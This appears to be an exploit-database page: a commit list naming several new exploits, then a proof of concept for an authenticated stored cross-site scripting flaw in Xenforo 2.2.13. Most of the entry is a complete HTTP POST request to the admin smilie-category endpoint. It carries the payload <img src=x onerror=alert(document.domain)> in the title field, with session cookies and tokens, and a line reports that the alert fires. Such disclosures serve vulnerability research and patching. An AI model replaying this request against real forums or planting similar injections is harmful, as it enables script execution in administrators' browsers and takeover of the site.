7807e6f266
7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
61 lines
No EOL
2.1 KiB
Text
61 lines
No EOL
2.1 KiB
Text
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
|
|
# Date: 2023-06-24
|
|
# Exploit Author: Furkan Karaarslan
|
|
# Category : Webapps
|
|
# Vendor Homepage: https://x.com/admin.php?smilies
|
|
# Version: 2.2.12 (REQUIRED)
|
|
# Tested on: Windows/Linux
|
|
# CVE :
|
|
|
|
-----------------------------------------------------------------------------
|
|
Requests
|
|
|
|
POST /admin.php?smilie-categories/0/save HTTP/1.1
|
|
Host: 127.0.0.1
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://127.0.0.1/admin.php?smilies/
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
|
|
Content-Length: 1038
|
|
Origin: http://127.0.0.1
|
|
Connection: close
|
|
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
|
|
-----------------------------333176689514537912041638543422
|
|
Content-Disposition: form-data; name="_xfToken"
|
|
|
|
1687616851,83fd2350307156281e51b17e20fe575b
|
|
-----------------------------333176689514537912041638543422
|
|
Content-Disposition: form-data; name="title"
|
|
|
|
<img src=x onerror=alert(document.domain)>
|
|
-----------------------------333176689514537912041638543422
|
|
Content-Disposition: form-data; name="display_order"
|
|
|
|
1
|
|
-----------------------------333176689514537912041638543422
|
|
Content-Disposition: form-data; name="_xfRequestUri"
|
|
|
|
/admin.php?smilies/
|
|
-----------------------------333176689514537912041638543422
|
|
Content-Disposition: form-data; name="_xfWithData"
|
|
|
|
1
|
|
-----------------------------333176689514537912041638543422
|
|
Content-Disposition: form-data; name="_xfToken"
|
|
|
|
1687616849,b74724a115448b864ba2db8f89f415f5
|
|
-----------------------------333176689514537912041638543422
|
|
Content-Disposition: form-data; name="_xfResponseType"
|
|
|
|
json
|
|
-----------------------------333176689514537912041638543422--
|
|
|
|
|
|
Response: After it is created, an alert comes immediately. |